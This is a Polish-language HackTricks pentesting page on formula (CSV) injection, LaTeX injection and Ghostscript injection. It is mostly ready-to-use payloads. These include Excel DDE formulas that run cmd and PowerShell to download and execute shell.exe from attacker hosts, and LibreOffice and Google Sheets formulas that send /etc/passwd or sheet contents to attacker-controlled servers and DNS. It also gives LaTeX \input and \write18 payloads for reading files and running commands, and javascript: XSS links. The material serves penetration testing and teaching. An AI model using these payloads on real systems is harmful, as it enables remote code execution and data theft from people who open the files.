hacktricks/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md

12 KiB

Wstrzykiwanie formuł/CSV/Doc/LaTeX/GhostScript

Nauka hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Grupa Try Hard Security

{% embed url="https://discord.gg/tryhardsecurity" %}


Wstrzykiwanie formuł

Informacje

Jeśli Twoje wejście jest odzwierciedlane wewnątrz plików CSV (lub innych plików, które prawdopodobnie zostaną otwarte w Excelu), możesz umieścić formuły Excela, które zostaną wykonane, gdy użytkownik otworzy plik lub gdy użytkownik kliknie w jakiś link w arkuszu kalkulacyjnym Excela.

{% hint style="danger" %} Obecnie Excel będzie alarmował (kilka razy) użytkownika, gdy coś jest ładowane spoza Excela, aby zapobiec mu działaniom złośliwym. Dlatego konieczne jest zastosowanie szczególnych wysiłków w dziedzinie inżynierii społecznej do ostatecznego ładunku. {% endhint %}

Wordlist

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

Hyperłącze

Poniższy przykład jest bardzo przydatny do eksfiltracji zawartości z końcowego arkusza kalkulacyjnego i wykonywania żądań do dowolnych lokalizacji. Ale wymaga kliknięcia w link (i zaakceptowania ostrzeżeń).

Przykład ten został zaczerpnięty z https://payatu.com/csv-injection-basic-to-exploit

Wyobraź sobie naruszenie bezpieczeństwa w systemie zarządzania rekordami studenckimi, które jest wykorzystywane poprzez atak CSV injection. Głównym zamiarem atakującego jest skompromitowanie systemu używanego przez nauczycieli do zarządzania danymi uczniów. Metoda ta polega na wstrzyknięciu złośliwego ładunku do aplikacji, poprzez wprowadzenie szkodliwych formuł do pól przeznaczonych na szczegóły uczniów. Atak przebiega następująco:

  1. Wstrzyknięcie Złośliwego Ładunku:
  • Atakujący przesyła formularz szczegółów ucznia, ale zawiera formułę często używaną w arkuszach kalkulacyjnych (np. =HYPERLINK("<malicious_link>","Kliknij tutaj")).
  • Ta formuła ma na celu utworzenie hiperłącza, które jednak wskazuje na złośliwy serwer kontrolowany przez atakującego.
  1. Eksportowanie Skompromitowanych Danych:
  • Nauczyciele, nieświadomi kompromitacji, korzystają z funkcjonalności aplikacji do eksportu danych do pliku CSV.
  • Plik CSV, po otwarciu, nadal zawiera złośliwy ładunek. Ten ładunek pojawia się jako klikalne hiperłącze w arkuszu kalkulacyjnym.
  1. Wywołanie Ataku:
  • Nauczyciel kliknie w hiperłącze, wierząc że jest to prawidłowa część szczegółów ucznia.
  • Po kliknięciu, wrażliwe dane (potencjalnie zawierające szczegóły z arkusza kalkulacyjnego lub komputera nauczyciela) są przesyłane na serwer atakującego.
  1. Logowanie Danych:
  • Serwer atakującego odbiera i rejestruje wrażliwe dane przesłane z komputera nauczyciela.
  • Atakujący może następnie wykorzystać te dane do różnych złośliwych celów, dalszego naruszania prywatności i bezpieczeństwa uczniów oraz instytucji.

RCE

Sprawdź oryginalny post dla dalszych szczegółów.

W określonych konfiguracjach lub starszych wersjach Excela, funkcja o nazwie Dynamic Data Exchange (DDE) może być wykorzystana do wykonywania arbitralnych poleceń. Aby to wykorzystać, należy włączyć następujące ustawienia:

  • Przejdź do Plik → Opcje → Centrum Zaufania → Ustawienia Centrum Zaufania → Zawartość Zewnętrzna i włącz Uruchamianie Serwera Dynamic Data Exchange.

Gdy arkusz kalkulacyjny z złośliwym ładunkiem zostanie otwarty (i jeśli użytkownik zaakceptuje ostrzeżenia), ładunek zostanie wykonany. Na przykład, aby uruchomić kalkulator, ładunek będzie:

=cmd|' /C calc'!xxx

Dodatkowe polecenia mogą również zostać wykonane, takie jak pobranie i wykonanie pliku za pomocą PowerShell:

=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Włączenie pliku lokalnego (LFI) w LibreOffice Calc

LibreOffice Calc może być używany do odczytywania plików lokalnych i wycieku danych. Oto kilka metod:

  • Odczytanie pierwszej linii z lokalnego pliku /etc/passwd: ='file:///etc/passwd'#$passwd.A1
  • Wyciek odczytanych danych do serwera kontrolowanego przez atakującego: =WEBSERVICE(CONCATENATE("http://<adres IP atakującego>:8080/",('file:///etc/passwd'#$passwd.A1)))
  • Wyciekanie więcej niż jednej linii: =WEBSERVICE(CONCATENATE("http://<adres IP atakującego>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
  • Wyciek DNS (wysyłanie odczytanych danych jako zapytania DNS do serwera DNS kontrolowanego przez atakującego): =WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<domena atakującego>"))

Arkusze Google do wycieku danych Out-of-Band (OOB)

Arkusz Google oferuje funkcje, które mogą być wykorzystane do wycieku danych Out-of-Band (OOB):

  • CONCATENATE: Łączy ciągi znaków - =CONCATENATE(A2:E2)
  • IMPORTXML: Importuje dane z typów danych strukturalnych - =IMPORTXML(CONCAT("http://<adres IP atakującego:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
  • IMPORTFEED: Importuje kanały RSS lub ATOM - =IMPORTFEED(CONCAT("http://<adres IP atakującego:Port>//123.txt?v=", CONCATENATE(A2:E2)))
  • IMPORTHTML: Importuje dane z tabel lub list HTML - =IMPORTHTML (CONCAT("http://<adres IP atakującego:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
  • IMPORTRANGE: Importuje zakres komórek z innego arkusza kalkulacyjnego - =IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Id_arkusza]", "arkusz1!A2:E2")
  • IMAGE: Wstawia obraz do komórki - =IMAGE("https://<adres IP atakującego:Port>/images/srpr/logo3w.png")

Wstrzyknięcie LaTeX

Zazwyczaj serwery, które znajdziesz w internecie, które konwertują kod LaTeX na PDF, używają pdflatex.
Ten program używa 3 głównych atrybutów do (nie)zezwalania na wykonanie poleceń:

  • --no-shell-escape: Wyłącza konstrukcję \write18{command}, nawet jeśli jest włączona w pliku texmf.cnf.
  • --shell-restricted: To samo co --shell-escape, ale ograniczone do 'bezpiecznego' zestawu predefiniowanych **poleceń (**Na Ubuntu 16.04 lista znajduje się w /usr/share/texmf/web2c/texmf.cnf).
  • --shell-escape: Włącza konstrukcję \write18{command}. Polecenie może być dowolnym poleceniem powłoki. Ta konstrukcja jest zazwyczaj zabroniona ze względów bezpieczeństwa.

Jednak istnieją inne sposoby na wykonanie poleceń, dlatego aby uniknąć RCE, bardzo ważne jest korzystanie z --shell-restricted.

Odczytaj plik

Możesz potrzebować dostosować wstrzyknięcie za pomocą opakowań takich jak [ lub $.

\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Odczytaj plik jednolinijkowy

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Odczytaj plik wielowierszowy

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file

Zapisz plik

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Wykonanie polecenia

Wejście polecenia zostanie przekierowane do stdin, użyj pliku tymczasowego, aby je otrzymać.

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

Jeśli otrzymasz jakikolwiek błąd LaTex, rozważ użycie base64, aby uzyskać wynik bez złych znaków.

\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base4
\input{|"/bin/hostname"}

Atak typu Cross Site Scripting

Od @EdOverflow

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

Wstrzykiwanie Ghostscript

Sprawdź https://blog.redteam-pentesting.de/2023/ghostscript-overview/

Odnośniki

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: